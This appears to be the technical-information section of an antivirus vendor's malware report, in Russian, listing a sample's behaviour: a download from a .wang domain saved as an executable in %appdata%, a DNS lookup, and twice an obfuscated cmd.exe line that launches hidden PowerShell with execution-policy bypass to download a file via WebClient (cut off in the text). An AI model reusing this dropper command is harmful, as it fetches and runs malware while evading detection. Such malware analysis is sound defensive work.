Техническая информация
- http://transporingsytw.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoW^eRSHel^l.exE -^e^x^EC^UTiONP^OlI^C^Y B^yPass ^-nO^prOf^iLe^ -wINDO^WS^Ty^le ^hI^dd^eN^ (^N^Ew-o^B^je^Ct^ S^yStem^.^Ne^T.^w^E^B^Cl^iE^NT)^.^dO^wNlOA^d^f^iLe(^'http://trans...
- DNS ASK tr#####ringsytw.wang
- '<SYSTEM32>\cmd.exe' /C "PoW^eRSHel^l.exE -^e^x^EC^UTiONP^OlI^C^Y B^yPass ^-nO^prOf^iLe^ -wINDO^WS^Ty^le ^hI^dd^eN^ (^N^Ew-o^B^je^Ct^ S^yStem^.^Ne^T.^w^E^B^Cl^iE^NT)^.^dO^wNlOA^d^f^iLe(^'http://trans...' (со скрытым окном)